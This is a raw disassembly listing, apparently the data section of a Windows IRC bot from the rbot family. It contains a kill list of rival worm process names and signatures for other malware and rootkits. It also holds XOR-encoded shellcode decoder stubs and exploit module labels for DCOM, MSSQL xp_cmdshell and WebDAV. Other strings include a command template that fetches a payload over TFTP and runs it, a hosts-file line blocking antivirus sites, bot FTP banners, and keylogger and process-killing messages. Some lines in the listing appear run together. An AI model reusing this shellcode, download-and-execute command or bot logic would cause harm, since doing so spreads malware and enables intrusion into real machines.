aShost_exe db 'SHOST.EXE',0 ; DATA XREF: .text:00447F00�o
align 4
aSys32_exe db 'SYS32.EXE',0 ; DATA XREF: .text:00447EFC�o
align 10h
aSvcchosst_exe db 'SVCCHOSST.EXE',0 ; DATA XREF: .text:00447EF8�o
align 10h
aBotpacked_exe db 'BOTPACKED.EXE',0 ; DATA XREF: .text:00447EF4�o
align 10h
aExxplorer_exe db 'EXXPLORER.EXE',0 ; DATA XREF: .text:00447EF0�o
align 10h
aIexplore7_exe db 'IEXPLORE7.EXE',0 ; DATA XREF: .text:00447EEC�o
align 10h
aIexplore6_exe db 'IEXPLORE6.EXE',0 ; DATA XREF: .text:00447EE8�o
align 10h
aIexplor_exe db 'IEXPLOR.EXE',0 ; DATA XREF: .text:00447EE4�o
aPenis32_exe db 'PENIS32.EXE',0 ; DATA XREF: .text:00447EE0�o
aWorm32_exe db 'WORM32.EXE',0 ; DATA XREF: .text:00447EDC�o
align 4
aC27d8fefD7ae42 db 'C27D8FEF-D7AE-42C0-82E6-F30598265639.EXE',0 ; DATA XREF: .text:00447ED8�o
align 10h
aScrtkfg_exe db 'SCRTKFG.EXE',0 ; DATA XREF: .text:00447ED4�o
aMsappview32_ex db 'MSAPPVIEW32.EXE',0 ; DATA XREF: .text:00447ED0�o
aSavenow_exe db 'savenow.exe',0 ; DATA XREF: .text:00447ECC�o
aX_exe db 'x.exe',0 ; DATA XREF: .text:00447EC8�o
align 10h
aRas2_exe db 'ras2.exe',0 ; DATA XREF: .text:00447EC4�o
align 4
aSvhcost_exe db 'svhcost.exe',0 ; DATA XREF: .text:00447EC0�o
aIpcscan_exe db 'ipcscan.exe',0 ; DATA XREF: .text:00447EBC�o
aNtdll64_exe db 'ntdll64.exe',0 ; DATA XREF: .text:00447EB8�o
aMsr_exe db 'msr.exe',0 ; DATA XREF: .text:00447EB4�o
aWgavm_exe_0 db 'wgavm.exe',0 ; DATA XREF: .text:00447EB0�o
align 4
aWgareg_exe_0 db 'wgareg.exe',0 ; DATA XREF: .text:00447EAC�o
align 10h
aCmd32_exe db 'cmd32.exe',0 ; DATA XREF: .text:00447EA8�o
align 4
aKspoold_exe db 'kspoold.exe',0 ; DATA XREF: .text:00447EA4�o
aHosts_exe db 'hosts.exe',0 ; DATA XREF: .text:00447EA0�o
align 4
aSvchost32_ex_0 db 'svchost32.exe',0 ; DATA XREF: .text:00447E9C�o
align 4
aWiniogon_exe_0 db 'winiogon.exe',0 ; DATA XREF: .text:00447E98�o
align 4
aIsass_exe_0 db 'isass.exe',0 ; DATA XREF: .text:00447E94�o
align 10h
a1sass_exe db '1sass.exe',0 ; DATA XREF: .text:00447E90�o
align 4
aMsrsys32_exe db 'msrsys32.exe',0 ; DATA XREF: .text:00447E8C�o
align 4
aSmsc32_exe db 'smsc32.exe',0 ; DATA XREF: .text:00447E88�o
align 4
aSysmgr_exe db 'sysmgr.exe',0 ; DATA XREF: .text:00447E84�o
align 4
aSpooisv_exe_0 db 'spooisv.exe',0 ; DATA XREF: .text:00447E80�o
aFun_exe db 'fun.exe',0 ; DATA XREF: .text:00447E7C�o
aAlgs_exe db 'algs.exe',0 ; DATA XREF: .text:00447E78�o
align 4
aSvhost_exe_0 db 'svhost.exe',0 ; DATA XREF: .text:00447E74�o
align 10h
aKernel32_exe_0 db 'kernel32.exe',0 ; DATA XREF: .text:00447E70�o
align 10h
aMsblast_exe_0 db 'msblast.exe',0 ; DATA XREF: .text:00447E6C�o
aPenis32_exe_0 db 'penis32.exe',0 ; DATA XREF: .text:00447E68�o
aPenis_exe db 'penis.exe',0 ; DATA XREF: .text:00447E64�o
align 4
aWorm32_exe_0 db 'worm32.exe',0 ; DATA XREF: .text:00447E60�o
align 10h
aMsile_exe db 'msile.exe',0 ; DATA XREF: .text:00447E5C�o
align 4
aSsms_exe db 'ssms.exe',0 ; DATA XREF: .text:00447E58�o
align 4
aEraseme_exe_0 db 'ERASEME*.EXE',0 ; DATA XREF: .text:00447E54�o
align 4
aEraseme_exe_1 db 'eraseme*.exe',0 ; DATA XREF: .text:00447E50�o
align 4
a_tmp_exe db '*.TMP.EXE',0 ; DATA XREF: .text:00447E4C�o
align 4
a_tmp_exe_0 db '*.tmp.exe',0 ; DATA XREF: .text:off_447E48�o
align 10h
dword_44C960 dd 4E56025Bh, 5D023A43h, 20732520h, 7325202Dh, 25202D20h
; DATA XREF: .text:00447E3C�o
dd 73h
dword_44C978 dd 65676152h, 2E746F42h, 42hdword_44C984 dd 2C343103h, 5B3A2E31h, 2C353103h, 47417231h, 546F4245h
; DATA XREF: .text:00447E34�o
dd 2C343103h, 2E3A5D31h, 2C353103h, 31h
dword_44C9A8 dd 65676152h, 2E746F42h, 41haExploitingSUse db '(Exploiting: %s User: %s / Pass: %s',0Dh,0Ah
; DATA XREF: .text:00447E2C�o
db ')',0
align 4
aNtbot_b db 'NTBot.B',0 ; DATA XREF: .text:00447E28�o
aStaticConstUns db 'static const unsigned long crc32tab[256] = {',0
; DATA XREF: .text:00447E24�o
align 4
aNtbot_a db 'NTBot.A',0 ; DATA XREF: .text:00447E20�o
; ---------------------------------------------------------------------------
loc_44CA1C: ; DATA XREF: .text:00447E1C�o
jmp short near ptr word_44CA2E
; ---------------------------------------------------------------------------
dw 4A5Ah
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cx, 13Ch
loc_44CA26: ; CODE XREF: .text:0044CA2A�j
xor byte ptr [edx+ecx], 99h
loop loc_44CA26
; ---------------------------------------------------------------------------
db 2 dup(0)
word_44CA2E dw 0 ; CODE XREF: .text:loc_44CA1C�j
dword_44CA30 dd 70747448h, 432E4C44h, 2E65646Fh, 41h, 70747468h, 772F2F3Ah
; DATA XREF: .text:00447E18�o
dd 662E7777h, 64657269h, 6F6D6561h, 6F632E6Eh, 6Dh, 65726946h
dd 6D656144h, 422E6E6Fh, 0
aCopyrightC2007 db 'Copyright (c) 2007 FireDaemon Technologies Limited',0
align 10h
aFiredaemon_a db 'FireDaemon.A',0
align 10h
aStrncpyWolffdi db 'strncpy(wolffdir, xdccdir, MAX_PATH); strncat(wolffdir, "\wolff",'
db ' MAX_PATH)',0
aWolf_kit db 'Wolf.Kit',0
align 4
aDefineHe4_hook db '#define HE4_HOOK_INV_VERSION 0x20001005',0
db 0
aHe4hookrootkit db 'He4HookRootkit-v2.15b',0
align 4
aMsdirectx_sys db 'msdirectx.sys',0 ; DATA XREF: .text:00447DF4�o
align 4
aFu_driver_b db 'FU.Driver.b',0
aRdriv_sys db 'rdriv.sys',0
align 4
aFu_driver_a db 'FU.Driver.a',0
dd 301B3015h, 3054304Ah, 3067305Eh, 30AB3087h, 30C230B1h
dd 31C331B7h, 31DB31CFh, 327A31F5h, 338E332Fh, 33A7339Ah
dd 343233AFh, 3442343Ah, 345A344Fh, 34E634B3h, 34F834EFh
dd 350A3501h, 351C3513h, 357E3524h, 366B3589h, 369C3688h
dd 36C336BAh, 36EE36E4h, 37133709h, 377C3775h, 3797378Bh
dd 391A37B1h, 39333924h, 39B13943h, 3A0B3A05h, 3A243A16h
dd 3A453A3Ah, 3A643A55h, 3A783A69h, 3A913A8Bh, 3AAD3A9Eh
dd 3AC23AB9h, 3ADE3AD8h, 0
aFu_rootkit_dri db 'FU.Rootkit.Driver',0
align 4
aStaticCharAc_d db 'static CHAR ac_driverName[] = "msdirectx.sys',0
align 4
aFu_rootkit_c db 'FU.Rootkit.c',0
align 4
aConstWcharDevi db 'const WCHAR deviceNameBuffer[] = L"\Device\msdirectx',0
align 4
aFu_rootkit_b db 'FU.Rootkit.b',0
align 4
aDefineFile_dev db '#define FILE_DEVICE_ROOTKIT 0x00002a7b',0
aFu_rootkit_a db 'FU.Rootkit.a',0
align 10h
aImportMsnMsnme db '#import "MSN/MSNMessengerAPI.tlb" named_guids, no_namespace',0
aMsnbot_b db 'MSNBot.b',0
align 4
aStaticConstCha db 'static const char *msg_english[] = {',0
align 10h
aMsnbot_a db 'MSNBot.a',0 ; DATA XREF: .text:00447DB8�o
align 4
aNircomline db 'NirComLine',0 ; DATA XREF: .text:00447DB0�o
; .text:00447DB4�o
align 4
aPipeEpmapper db 'pipe\epmapper\',0 ; DATA XREF: .text:00447DAC�o
align 4
aDcomOldScan db 'Dcom-Old-Scan',0 ; DATA XREF: .text:00447DA8�o
align 4
aR0lgodlhfaauak db 'R0lGODlhFAAUAKIAAAAAAP//////93d3cDAwIaGhgQEBP//////wAAACH5BAEAAAY'
; DATA XREF: .text:00447DA4�o
db 'ALAAAAAAUABQAAAM8',0
align 4
aC99 db 'c99',0 ; DATA XREF: .text:00447DA0�o
aI2luy2x1zgugph db 'I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZ'
; DATA XREF: .text:00447D9C�o
db 'SA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZG'
db 'UgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJ'
db 'nYyxhcmd2KQ0KaW50I',0
align 4
aR57 db 'r57',0 ; DATA XREF: .text:00447D98�o
aHiderunHiddenA db 'HideRun -- hidden application launcher.',0 ; DATA XREF: .text:00447D94�o
aHiderun db 'HideRun',0 ; DATA XREF: .text:00447D90�o
aSoftwareAdrian db 'Software\Adrian Lopez\HideWindow\Preferences HideWindow',0
; DATA XREF: .text:00447D8C�o
aHiderGui db 'Hider-Gui',0 ; DATA XREF: .text:00447D88�o
align 10h
aSoftwareMicr_6 db 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones'
; DATA XREF: .text:00447D84�o
db '\3',0
aLowerzones db 'LowerZones',0 ; DATA XREF: .text:00447D80�o
align 10h
aWindowsupdate_ db 'windowsupdate.com',0 ; DATA XREF: .text:00447D7C�o
align 4
aMsblast db 'MsBlast',0 ; DATA XREF: .text:00447D78�o
dword_44CFAC dd 0FFFFFF43h, 1303030h, 282B1F0Ah, 132A12Bh, 0aBeagle db 'Beagle',0 ; DATA XREF: .text:00447D70�o
align 4
aDonateToTheHur db 'Donate to the Hurricane Katrina relief effort.',0
; DATA XREF: .text:00447D6C�o
align 4
aBobic_b db 'Bobic.B',0 ; DATA XREF: .text:00447D68�o
aOsamaBinLadenC db 'Osama Bin Laden Captured.',0 ; DATA XREF: .text:00447D64�o
align 4
aBobic_a db 'Bobic.A',0 ; DATA XREF: .text:00447D60�o
; ---------------------------------------------------------------------------
loc_44D024: ; DATA XREF: .text:00447D5C�o
jmp short loc_44D035
; ---------------------------------------------------------------------------
loc_44D026: ; CODE XREF: .text:loc_44D035�p
pop ebx
xor ecx, ecx
sub cx, 0FFEEh
loc_44D02D: ; CODE XREF: .text:0044D031�j
xor byte ptr [ebx], 55h
inc ebx
loop loc_44D02D
jmp short near ptr word_44D03A
; ---------------------------------------------------------------------------
loc_44D035: ; CODE XREF: .text:loc_44D024�j
call loc_44D026
; ---------------------------------------------------------------------------
word_44D03A dw 0 ; CODE XREF: .text:0044D033�j
dword_44D03C dd 69614D49h, 68532E6Ch, 6C6C65hdword_44D048 dd 0D959506Ah, 2474D9EEh, 73815BF4h, 6F8C0F13h, 0
; DATA XREF: .text:00447D54�o
dword_44D05C dd 77537049h, 68637469h, 6568532Eh, 6C6Ch; ---------------------------------------------------------------------------
loc_44D06C: ; DATA XREF: .text:00447D4C�o
jmp short near ptr word_44D0DE
; ---------------------------------------------------------------------------
dw 3356h
dd 408B64C0h, 78C08530h, 0C408B0Ch, 0
dword_44D080 dd 4474654Eh, 532E4544h, 6C6C6568h, 0; ---------------------------------------------------------------------------
loc_44D090: ; DATA XREF: .text:00447D44�o
jmp short near ptr word_44D0A2
; ---------------------------------------------------------------------------
dw 4B5Bh
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cx, 125h
loc_44D09A: ; CODE XREF: .text:0044D09E�j
xor byte ptr [ebx+ecx], 99h
loop loc_44D09A
; ---------------------------------------------------------------------------
db 2 dup(0)
word_44D0A2 dw 0 ; CODE XREF: .text:loc_44D090�j
dword_44D0A4 dd 68637653h, 2E74736Fh, 6C656853h, 6Chdword_44D0B4 dd 8166C933h, 0D9FFB0E9h, 2474D9EEh, 73815BF4h, 0
; DATA XREF: .text:00447D3C�o
dword_44D0C8 dd 63626954h, 68532E6Fh, 6C6C65h; ---------------------------------------------------------------------------
loc_44D0D4: ; DATA XREF: .text:00447D34�o
jmp short loc_44D0EF
; ---------------------------------------------------------------------------
dw 315Eh
dd 89E981C9h
db 0FFh, 0
word_44D0DE dw 0 ; CODE XREF: .text:loc_44D06C�j
aOld4444shell db 'Old4444Shell',0 ; DATA XREF: .text:00447D30�o
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_44D0EF: ; CODE XREF: .text:loc_44D0D4�j
; DATA XREF: .text:00447D2C�o
add [ebx+46h], dl
push esp
loc_44D0F3: ; DATA XREF: .text:00447D28�o
xor ds:53006925h, dh
jnz short loc_44D15D
aaa
; ---------------------------------------------------------------------------
dd 0
a022moptestmv1_ db '022¬OPtest¬v1.1',0Dh,0Ah,0 ; DATA XREF: .text:00447D24�o
align 4
aOptix db 'Optix',0 ; DATA XREF: .text:00447D20�o
align 4
aPleaz_runS db 'pleaz_run%s',0 ; DATA XREF: .text:00447D1C�o
aNetdevil db 'NetDevil',0 ; DATA XREF: .text:00447D18�o
align 4
aSystemrootSyst db '%systemroot%\system32\cmd.exe',0 ; DATA XREF: .text:00447D14�o
align 4
aVncscan db 'VNCScan',0 ; DATA XREF: .text:00447D10�o
byte_44D15C db 80h ; DATA XREF: .text:00447D0C�o
; ---------------------------------------------------------------------------
loc_44D15D: ; CODE XREF: .text:0044D0F9�j
bound eax, [ecx]
add bh, [ebp+1000100h]
add [esi], dl
; ---------------------------------------------------------------------------
db 8Fh
dd 182h
aIis5ssl db 'IIS5SSL',0 ; DATA XREF: .text:00447D08�o
aMain db '[MAIN]: ',0 ; DATA XREF: .text:00447D04�o
align 10h
aRxMain db 'Rx Main',0 ; DATA XREF: .text:00447D00�o
; ---------------------------------------------------------------------------
loc_44D188: ; DATA XREF: .text:00447CFC�o
mov edi, ecx
xor al, al
inc al
repne scasb
jmp edi
; ---------------------------------------------------------------------------
align 4
aWebdav db 'WebDav',0 ; DATA XREF: .text:00447CF8�o
align 4
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell',0 ; DATA XREF: .text:00447CF4�o
align 4
aMssql_b db 'MSSQL.B',0 ; DATA XREF: .text:00447CF0�o
aThcthcthcthcth db 'THCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHCTHC',0
; DATA XREF: .text:00447CEC�o
align 4
aMssql_a db 'MSSQL.A',0 ; DATA XREF: .text:00447CE8�o
a8d9f4e40A03d11 db '8d9f4e40-a03d-11ce-8f69-08003e30051b',0 ; DATA XREF: .text:00447CE4�o
align 4
aPnp_b db 'PNP.b',0 ; DATA XREF: .text:00447CE0�o
align 4
dword_44D22C dd 0E983C929h, 0D9EED9B0h, 5BF42474h, 19137381h, 0
; DATA XREF: .text:00447CDC�o
dword_44D240 dd 2E504E50h, 61hdword_44D248 dd 41435302h, 3A3A204Eh, 220hdword_44D254 dd 43207852h, 726F6C6Fh, 6E616353h, 622Eha127_0_0_1Www_s db 0Ah ; DATA XREF: .text:00447CCC�o
db '127.0.0.1',9,'www.symantec.com',0Ah,0
align 4
aChangehosts db 'ChangeHosts',0 ; DATA XREF: .text:00447CC8�o
dword_44D290 dd 57501C43h, 5AD1FF56h, 8430358h, 8B52F88Bh, 0dword_44D2A4 dd 6C6C6548h, 2E746F62h, 62hdword_44D2B0 dd 6C6C6548h, 2E746F62h, 61haRpcpatch_mutex db 'RpcPatch_Mutex',0 ; DATA XREF: .text:00447CB4�o
align 4
aWelchia_a db 'Welchia.a',0 ; DATA XREF: .text:00447CB0�o
align 4
aAddexExinfo db 'AddEx(exinfo)',0 ; DATA XREF: .text:00447CAC�o
align 4
aZotobForbotMod db 'Zotob/ForBot Mods',0 ; DATA XREF: .text:00447CA8�o
align 4
dword_44D2FC dd 0DDCA6D6Ah, 8090F0E4h, 4A22Fh ; .text:00447CBC�o
aBlaster db 'Blaster',0 ; DATA XREF: .text:00447CA0�o
aFbsgjnerZvpe_0 db 'Fbsgjner\Zvpebfbsg\Jvaqbjf\PheeragIrefvba\Rkcybere\PbzQyt32\Irefv'
; DATA XREF: .text:00447C9C�o
db 'ba',0
aMydoom_c db 'MyDoom.C',0 ; DATA XREF: .text:00447C98�o
align 10h
aFbsgjnerZvpebf db 'Fbsgjner\Zvpebfbsg\JNO\JNO4\Jno Svyr Anzr',0
; DATA XREF: .text:00447C94�o
align 4
aMydoom_b db 'MyDoom.B',0 ; DATA XREF: .text:00447C90�o
align 4
dword_44D398 dd 9E3C1385h, 0A2hdword_44D3A0 dd 6F44794Dh, 412E6D6Fh, 2 dup(0)aSendingYouPack db '** Sending you pack #%i ("%s"), which is %sB (resume supported)',0
; DATA XREF: .text:00447C84�o
aIrofferAll db 'Iroffer-All',0 ; DATA XREF: .text:00447C80�o
aTotalOffered1_ db 'Total Offered: %1.1f MB Total Transferred: %1.2f %cB',0
; DATA XREF: .text:00447C7C�o
align 4
aIroffer_b db 'Iroffer.b',0 ; DATA XREF: .text:00447C78�o
align 10h
aHttpIroffer_or db 'http://iroffer.org/',0 ; DATA XREF: .text:00447C74�o
aIroffer_a db 'Iroffer.a',0 ; DATA XREF: .text:00447C70�o
align 10h
aRoot_start db 'root.start',0 ; DATA XREF: .text:00447C6C�o
align 4
aOtherbot_b db 'Otherbot.b',0 ; DATA XREF: .text:00447C68�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: .text:00447C64�o
align 4
aOtherbot_a db 'Otherbot.a',0 ; DATA XREF: .text:00447C60�o
align 10h
dword_44D490 dd 8B64DB33h, 408B3043h, 1C708B0Ch, 8408BADh, 0aLinkbot_shellc db 'Linkbot.Shellcode',0 ; DATA XREF: .text:00447C58�o
align 4
aRpc_c db 'RPC.c:',0 ; DATA XREF: .text:00447C54�o
align 10h
aLinkbot_rpc db 'Linkbot.RPC',0 ; DATA XREF: .text:00447C50�o
aDcom2 db 'dcom2:',0 ; DATA XREF: .text:00447C4C�o
align 4
aLinkbot_dcom_c db 'Linkbot.dcom.c',0 ; DATA XREF: .text:00447C48�o
align 4
aDcom2_c db 'dcom2.c:',0 ; DATA XREF: .text:00447C44�o
align 10h
aLinkbot_dcom_b db 'Linkbot.dcom.b',0 ; DATA XREF: .text:00447C40�o
align 10h
dword_44D500 dd 234032Dh, 6D6F6364h, 2632E32h, 2D03hdword_44D510 dd 6B6E694Ch, 2E746F62h, 6D6F6364h, 612Ehdword_44D520 dd 63737069h, 2A206E61h, 2A2E2A2Eh, 2A2Ehdword_44D530 dd 6B6E694Ch, 2D746F62h, 6E616353h, 612EhaWeBackLooooooo db 'We BaCk LoooooooooooOOOOOOOOOOOOOooo',0 ; DATA XREF: .text:00447C2C�o
align 4
aQ8 db 'Q8',0 ; DATA XREF: .text:00447C28�o
align 4
aPsniffThread db 'psniff thread',0 ; DATA XREF: .text:00447C24�o
align 4
aRbot_psniff db 'rbot.psniff',0 ; DATA XREF: .text:00447C20�o
dword_44D588 dd 0F254C481h, 0E8FCFFFFh, 46hoff_44D594 dd offset byte_4E5341 ; DATA XREF: .text:00447C18�o
dword_44D598 dd 0D959516Ah, 2474D9EEh, 0F4haNetapi4444bind db 'Netapi4444Bind',0 ; DATA XREF: .text:00447C10�o
align 4
a3GsUT db '3Ƀé°ÙîÙt',0 ; DATA XREF: .text:00447C0C�o
align 10h
off_44D5C0 dd offset byte_4D5953 ; DATA XREF: .text:00447C08�o
dword_44D5C4 dd 0E983C933h, 0D9EED9AFh, 74haC101 db 'C101',0 ; DATA XREF: .text:00447C00�o
align 4
loc_44D5D8: ; DATA XREF: .text:00447BFC�o
jmp short loc_44D5DC
; ---------------------------------------------------------------------------
loc_44D5DA: ; CODE XREF: .text:loc_44D5DC�p
jmp short near ptr byte_44D5E1
; ---------------------------------------------------------------------------
loc_44D5DC: ; CODE XREF: .text:loc_44D5D8�j
call loc_44D5DA
; ---------------------------------------------------------------------------
byte_44D5E1 db 3 dup(0) ; CODE XREF: .text:loc_44D5DA�j
dword_44D5E4 dd 412E5450h, 0 dword_44D5EC dd 4143535Bh, 203A5D4Eh, 0dword_44D5F8 dd 53207852h, 6E6163hdword_44D600 dd 0D959506Ah, 2474D9EEh, 0F4hdword_44D60C dd 5D42525Bh, 53746F42h, 6C6C6568h, 0dword_44D61C dd 34D9E1D9h, 58585824h, 58hdword_44D628 dd 6F626159h, 612E74h; ---------------------------------------------------------------------------
loc_44D630: ; DATA XREF: .text:00447BDC�o
jmp short near ptr aTftp+6
; ---------------------------------------------------------------------------
dw 758Bh
dd 35748B3Ch, 78h
dword_44D63C dd 47323357h, 53206E65h, 43haCmdCTftpISGetS db 'cmd /c tftp -i %s GET %s &start %s &exit',0 ; DATA XREF: .text:00447BD4�o
align 4
aTftpget_b db 'TFTPGet.b',0 ; DATA XREF: .text:00447BD0�o
align 10h
aTftp db '[TFTP]',0 ; CODE XREF: .text:loc_44D630�j
; DATA XREF: .text:00447BCC�o
align 4
aRxTftp db 'Rx TFTP',0 ; DATA XREF: .text:00447BC8�o
aTftpISGetSS db 'tftp -i %s get %s &%s',0Ah,0 ; DATA XREF: .text:00447BC4�o
align 4
aTftpget_a db 'TFTPGet.a',0 ; DATA XREF: .text:00447BC0�o
align 4
a220BotServerWi db '220 Bot Server (Win32)',0Dh,0Ah,0 ; DATA XREF: .text:00447BBC�o
align 10h
aPhatbot db 'PhatBot',0 ; DATA XREF: .text:00447BB8�o
a220WelcomeToBo db '220 "Welcome to Bot FTP service."',0Dh,0Ah,0
; DATA XREF: .text:00447BB4�o
aAgobot db 'AgoBot',0 ; DATA XREF: .text:00447BB0�o
align 4
aStnyftpd0wnsJ0 db 'StnyFtpd 0wns j00',0 ; DATA XREF: .text:00447BAC�o
align 4
aStnyftpd db 'StnyFtpd',0 ; DATA XREF: .text:00447BA8�o
align 4
aMain_0 db '-MAiN-',0 ; DATA XREF: .text:00447BA4�o
align 4
aRep08Main db 'Rep08 Main',0 ; DATA XREF: .text:00447BA0�o
align 4
a220ReptileWelc db '220 Reptile welcomes you..',0Dh,0Ah,0 ; DATA XREF: .text:00447B9C�o
align 4
aRep08Ftpd db 'Rep08 FTPd',0 ; DATA XREF: .text:00447B98�o
align 4
aReptileWelcome db 'Reptile welcomes you...',0 ; DATA XREF: .text:00447B94�o
aRepFtpd db 'Rep FTPd',0 ; DATA XREF: .text:00447B90�o
align 4
loc_44D788: ; DATA XREF: .text:00447B8C�o
jmp short near ptr word_44D79A
; ---------------------------------------------------------------------------
dw 4B5Bh
dd 0B966C933h, 25h
dword_44D794 dd 4C205852h db 53h, 0
word_44D79A dw 0 ; CODE XREF: .text:loc_44D788�j
dword_44D79C dd 5054465Bh, 203A5Dhdword_44D7A4 dd 46207852h, 7074h; ---------------------------------------------------------------------------
loc_44D7AC: ; DATA XREF: .text:00447B7C�o
jmp short loc_44D7BE
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 7Dh
dword_44D7B8 dd 20706552h ; ---------------------------------------------------------------------------
push ebx
inc ebx
loc_44D7BE: ; CODE XREF: .text:loc_44D7AC�j
xor al, [eax]
loc_44D7C0: ; DATA XREF: .text:00447B74�o
jmp short near ptr word_44D7D2
; ---------------------------------------------------------------------------
dw 4A5Ah
dd 0B966C933h, 66h
dword_44D7CC dd 53205852h db 43h, 32h
word_44D7D2 dw 0 ; CODE XREF: .text:loc_44D7C0�j
dword_44D7D4 dd 364C033h, 0C783040h, 8Bhdword_44D7E0 dd 53205852h, 3143hdword_44D7E8 dd 43524902h, 203A3A20h, 2dword_44D7F4 dd 43207852h, 726F6C6Fh, 2E435249h, 62hdword_44D804 dd 49414D02h, 3A3A204Eh, 220hdword_44D810 dd 43207852h, 726F6C6Fh, 622Ehdword_44D81C dd 63533A3Ah, 3A3A6E61h, 0dword_44D828 dd 43207852h, 726F6C6Fh, 6E616353h, 0dword_44D838 dd 614D3A3Ah, 3A3A6E69h, 0dword_44D844 dd 43207852h, 726F6C6Fh, 0dword_44D850 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:00447B44�o
dd 2BBBB02h, 73552020h, 7265h
dword_44D870 dd 5A4E7852h, 632E4Dha_n_z_m_Irc_p_l db '.n.z.m. (irc.p.l.g) .»». ',0 ; DATA XREF: .text:00447B3C�o
align 4
aRxnzm_b db 'RxNZM.b',0 ; DATA XREF: .text:00447B38�o
dword_44D89C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: .text:00447B34�o
dd 2BBBB02h, 20h
aRxnzm db 'RxNZM',0 ; DATA XREF: .text:00447B30�o
align 10h
dword_44D8C0 dd 234032Dh, 6E69616Dh, 202D0302h, 0dword_44D8D0 dd 4C2D7852h, 2D6B6E69h, 2E414950h, 63hdword_44D8E0 dd 234032Dh, 6E616373h, 202D0302h, 0dword_44D8F0 dd 4C2D7852h, 2D6B6E69h, 414950hdword_44D8FC dd 5446545Bh, 3A5D4450h, 20hdword_44D908 dd 54207852h, 64505446h, 0dword_44D914 dd 5446545Bh, 203A5D50h, 0dword_44D920 dd 54207852h, 2E505446h, 62hdword_44D92C dd 50544654h, 2F2Fhdword_44D934 dd 53207852h, 6873616Ch, 7446542Dh, 70hdword_44D944 dd 4E414353h, 2F2Fhdword_44D94C dd 53207852h, 6873616Ch, 6163532Dh, 6Ehdword_44D95C dd 4E49414Dh, 2F2Fhdword_44D964 dd 53207852h, 6873616Ch, 0dword_44D970 dd 4F57445Bh, 414F4C4Eh, 203A5D44h, 0dword_44D980 dd 44207852h, 6C6E776Fh, 64616Fhdword_44D98C dd 5054465Bh, 203A5D44h, 0dword_44D998 dd 46207852h, 447074hdword_44D9A0 dd 59454B5Bh, 5D474F4Ch, 203Ahdword_44D9AC dd 4B207852h, 6F4C7965h, 67hdword_44D9B8 dd 234032Dh, 2637269h, 2D03haPiabot db 'PiABot',0 ; DATA XREF: .text:00447AD8�o
align 4
aIrc db 'IRC//',0 ; DATA XREF: .text:00447AD4�o
align 4
aRxIrc_c db 'Rx IRC.c',0 ; DATA XREF: .text:00447AD0�o
align 10h
aIrc_0 db '[IRC]: ',0 ; DATA XREF: .text:off_447ACC�o
aRxIrc db 'Rx IRC',0 ; DATA XREF: .text:00447AC8�o
align 10h
aSFoundStringSI db '%s Found string "%s" in "%s" File "%s"',0 ; DATA XREF: sub_41EDC3+D1�o
align 4
aSTerminatedAnd db '%s Terminated and deleted %s',0 ; DATA XREF: sub_41EF29+BC�o
align 4
aSBkillShutdown db '%s bkill shutdown for wride.',0 ; DATA XREF: sub_41F02F+3E4�o
; sub_41F02F+41D�o
align 4
aSRunningAvscan db '%s Running AVScan on %s',0 ; DATA XREF: sub_41F02F+312�o
aSMatchedAndKil db '%s Matched and killing %s',0 ; DATA XREF: sub_41F02F+29D�o
align 4
aSKillingS db '%s Killing %s',0 ; DATA XREF: sub_41F02F+228�o
align 4
asc_44DA9C: ; DATA XREF: sub_41F02F+56�o
; sub_423850+A4�o ...
unicode 0, <\>,0
aSProcsSSTotalS db '%s Procs %s: "%s", Total %s Time: %s.',0 ; DATA XREF: sub_41F46D+2FB�o
align 4
aSCreatedProcSP db '%s Created proc: "%s", PID: <%d>',0 ; DATA XREF: sub_41F46D+1CA�o
align 4
aSSToCreatePr_0 db '%s %s to create proc: "%s", %s: <%d>',0 ; DATA XREF: sub_41F46D+16F�o
; sub_41F46D+19D�o
align 4
aSCouldnTPars_0 db '%s Couldn',27h,'t parse path, %s <%d>',0 ; DATA XREF: sub_41F46D+98�o
; sub_41F46D+BE�o
aSPidIKilledAnd db '%s PID "%i" killed and deleted',0 ; DATA XREF: sub_41F7B0+3D8�o
align 4
aSFailedToKillA db '%s Failed to kill and erase proc',0 ; DATA XREF: sub_41F7B0+37B�o
align 4
aSFailedToKillP db '%s Failed to kill proc',0 ; DATA XREF: sub_41F7B0:loc_41FA58�o
align 10h
aSPidIKilled db '%s PID "%i" killed',0 ; DATA XREF: sub_41F7B0+251�o
align 4
aSProSKilledTot db '%s Pro "%s" killed,total: <%s>',0 ; DATA XREF: sub_41F7B0+1F9�o
align 4
aSUnableToListP db '%s Unable to list procs, %s: <%d>',0 ; DATA XREF: sub_41F7B0+185�o
; sub_41F7B0+1AA�o
align 4
aSEndOfList db '%s End of list',0 ; DATA XREF: sub_41F7B0+14D�o
align 4
a6d10sS db ' %-6d- %-10s- "%s"',0 ; DATA XREF: sub_41F7B0+106�o
align 4
aK db ' K',0 ; DATA XREF: sub_41F7B0+E9�o
align 10h
aPidAMemoryUsag db ' PID - Memory Usage - Process',0 ; DATA XREF: sub_41F7B0+9D�o
aSProcsList db '%s Procs List:',0 ; DATA XREF: sub_41F7B0+82�o
align 10h
aSS_4 db '%s / %s',0Ah,0 ; DATA XREF: sub_41FB92+17A�o
align 4
aSD_2 db '%s: <%d>',0 ; DATA XREF: sub_41FB92+11D�o
align 4
aUnknown db 'unknown',0 ; DATA XREF: sub_41FD79+E0�o
; sub_427E97+3B�o
aSedebugprivile db 'SeDebugPrivilege',0 ; DATA XREF: sub_41FD79+5C�o
; sub_41FF76+4E�o
align 4
aSPingRequestFr db '%s Ping request from: %s!%s@%s',0 ; DATA XREF: sub_420399+62F�o
align 4
